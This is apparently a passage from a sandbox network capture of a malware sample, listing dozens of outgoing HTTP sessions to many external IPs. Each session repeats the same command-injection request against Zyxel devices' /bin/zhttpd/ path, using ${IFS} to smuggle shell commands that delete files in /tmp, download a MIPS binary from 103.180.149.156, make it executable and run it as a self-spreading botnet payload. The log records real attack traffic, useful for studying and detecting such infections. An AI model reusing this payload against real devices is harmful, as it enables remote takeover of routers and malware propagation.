                                                        Feb 2, 2024 06:21:27.282578945 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8791192.168.2.1433432158.153.233.208443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:27.282639027 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8792192.168.2.145284844.154.75.145443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:27.282677889 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8793192.168.2.143328868.21.76.206443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:27.282701969 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8794192.168.2.144591496.116.108.215443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:27.282741070 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8795192.168.2.143804252.34.131.196443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:27.282803059 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8796192.168.2.145080613.38.33.43443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:27.282849073 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8797192.168.2.1434522133.114.90.32443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:27.282907009 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8798192.168.2.1446522152.164.132.99443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:27.282939911 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8799192.168.2.1446770100.180.34.58443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:27.282995939 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8800192.168.2.145113493.49.118.127443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:27.283023119 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8801192.168.2.1446720109.182.62.225443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:27.283052921 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8802192.168.2.1447688129.225.208.148443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:27.283087969 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8803192.168.2.1441232192.75.159.230443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:27.283130884 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8804192.168.2.1447334222.10.7.177443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:27.283169985 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8805192.168.2.144669290.166.176.96443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:27.283193111 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8806192.168.2.144336495.192.221.102443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:27.283242941 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8807192.168.2.14468868.204.253.81443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:27.283286095 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8808192.168.2.1456376152.241.241.165443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:27.283313990 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8809192.168.2.144916657.111.235.156443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:27.283360958 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8810192.168.2.145192260.49.203.41443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:27.283386946 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8811192.168.2.1448588111.63.223.170443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:27.283436060 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8812192.168.2.1435606209.1.130.160443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:27.283463001 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8813192.168.2.1455356133.164.130.135443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:27.283509970 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8814192.168.2.144426639.24.41.221443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:27.283529043 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8815192.168.2.1444430177.91.45.41443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:27.287610054 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8816192.168.2.145852497.180.244.106443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:27.287648916 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8817192.168.2.1447760116.221.189.200443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:27.287681103 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8818192.168.2.1442964144.71.110.120443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:27.287704945 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8819192.168.2.1435728124.98.176.188443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:27.287769079 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8820192.168.2.1450092168.176.157.51443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:27.287790060 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8821192.168.2.1457040148.164.158.178443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:27.287843943 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8822192.168.2.1460502195.27.104.213443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:27.287888050 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8823192.168.2.1443586134.171.119.20443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:27.287929058 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8824192.168.2.143294295.204.103.32443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:27.287981987 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8825192.168.2.1437070195.101.217.110443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:27.288013935 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8826192.168.2.143966844.166.69.120443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:27.288060904 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8827192.168.2.14539865.15.25.246443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:27.288091898 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8828192.168.2.1435870187.9.94.12443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:27.288155079 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8829192.168.2.1450526170.244.156.18443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:27.288186073 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8830192.168.2.1456822170.66.207.247443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:27.288220882 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8831192.168.2.1456194120.181.130.51443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:27.288274050 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8832192.168.2.1456166170.254.169.178443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:27.288292885 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8833192.168.2.1451144168.44.47.50443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:27.288330078 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8834192.168.2.146084237.101.159.237443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:27.288369894 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8835192.168.2.1456890199.245.19.129443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:27.288417101 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8836192.168.2.145827065.198.75.214443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:27.288455963 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8837192.168.2.1440130171.183.49.14443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:27.288487911 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8838192.168.2.1446190191.219.248.208443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:27.288527966 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8839192.168.2.1442618194.38.24.61443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:27.288587093 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8840192.168.2.145372293.138.61.40443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:27.288623095 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8841192.168.2.145289241.17.165.111443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:27.288665056 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8842192.168.2.1433400211.232.22.133443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:28.297084093 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8843192.168.2.1436444158.174.79.173443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:28.297115088 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8844192.168.2.1445904132.69.143.195443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:28.297152042 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8845192.168.2.1436458135.6.34.235443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:28.297183990 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8846192.168.2.145188418.100.240.120443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:28.297235966 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8847192.168.2.1449276180.143.215.114443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:28.297275066 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8848192.168.2.1445188126.233.149.3443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:28.297312975 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8849192.168.2.143584834.46.169.87443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:28.297363043 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8850192.168.2.145459898.114.190.161443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:28.297369957 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8851192.168.2.1454608177.188.36.30443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:28.297414064 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8852192.168.2.1449412107.173.39.219443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:28.297461033 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8853192.168.2.1436350160.169.138.26443
                                                        TimestampBytes transferredDirectionData
